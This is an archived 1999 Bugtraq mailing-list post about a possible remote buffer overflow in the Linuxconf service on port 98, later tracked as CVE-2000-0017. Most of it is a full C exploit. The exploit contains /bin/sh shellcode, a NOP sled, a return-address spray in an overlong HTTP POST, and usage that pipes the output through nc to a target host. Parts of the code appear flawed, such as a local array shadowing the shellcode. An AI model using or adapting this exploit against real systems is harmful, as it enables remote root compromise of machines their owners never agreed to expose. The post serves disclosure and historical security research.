Headline
CVE-2000-0017: '(Possible) Linuxconf Remote Buffer Overflow Vulnerability'
Buffer overflow in Linux linuxconf package allows remote attackers to gain root privileges via a long parameter.
[prev in list] [next in list] [prev in thread] [next in thread] List: bugtraq Subject: (Possible) Linuxconf Remote Buffer Overflow Vulnerability From: Elias Levy <aleph1 () SECURITYFOCUS ! COM> Date: 1999-12-21 18:31:14 [Download RAW message or body]
There may exists a buffer overflow vulnerability in the Linuxconf package shipped with some version of Linux systems. The vulnerability may be in the program’s handling of HTTP headers. Initial testing with Linuxconf 1.16r10 under RedHat 6.0 was inconclusive. If other can test the exploit and report their results it would be appreciated.
This is an example of what good can happen from sharing security incident information. There have been reports in the INCIDENTS mailing list for several months now of scans for port 98. Since no publicly known major vulnerabilities existed in this service the traffic was somewhat strange. After some digging around Jon Starnaud [email protected] was able to find this exploit.
If you are not subscribed to INCIDENTS and wish to share incident information I suggest you sign up. If the vulnerability does exists this would be the second vulnerability we discover thanks to sharing incident information (the first one being sadmind).
http://www.securityfocus.com/forums/incidents/faq.html
/*
linuxconf exploit by R00T-X © 1999
USER_AGENT overflow x86 should work on all linux’s but you need to have network access to linuxconf
greetz to: j0e, AcidCrunCh, |420|, umm and everyone who knows me, heh :P
have fun with this but for EDUCATIONAL PURPOSES :)
Usage: (./linexp <offset>;cat)| nc targethost 98
*/
char shell[] = “\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90” “\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90” “\x90\x90\x90\xeb\x3b\x5e\x89\x76\x08\x31\xed\x31\xc9\x31\xc0\x88” “\x6e\x07\x89\x6e\x0c\xb0\x0b\x89\xf3\x8d\x6e\x08\x89\xe9\x8d\x6e” “\x0c\x89\xea\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\x90\x90\x90\x90” “\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90” "\xe8\xc0\xff\xff\xff/bin/sh\x00";
#include <stdio.h> #include <stdlib.h> #include <limits.h> #include <string.h>
#define BUFLEN 1025 #define NOP 0x90
void main (int argc, char *argv[]) { char buf[BUFLEN]; int offset,nop,i; unsigned long esp; char shell[1024+300];
if(argc < 2) { fprintf(stderr,"usage: (%s <offset>;cat)|nc host.com 98\n", argv[0]); exit(0); }
nop = 511; esp = 0xefbfd5e8; offset = atoi(argv[1]);
memset(buf, NOP, BUFLEN); memcpy(buf+(long)nop, shell, strlen(shell));
for (i = 256; i < BUFLEN - 3; i += 2) { *((int *) &buf[i]) = esp + (long) offset; shell[ sizeof(shell)-1 ] = 0; }
printf("POST / HTTP/1.0\r\nContent-Length: %d, User-agent: \r\n", BUFLEN); for (i = 0; i < BUFLEN; i++) putchar(buf[i]);
printf(“\r\n”);
return; }
– Elias Levy Security Focus http://www.securityfocus.com/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic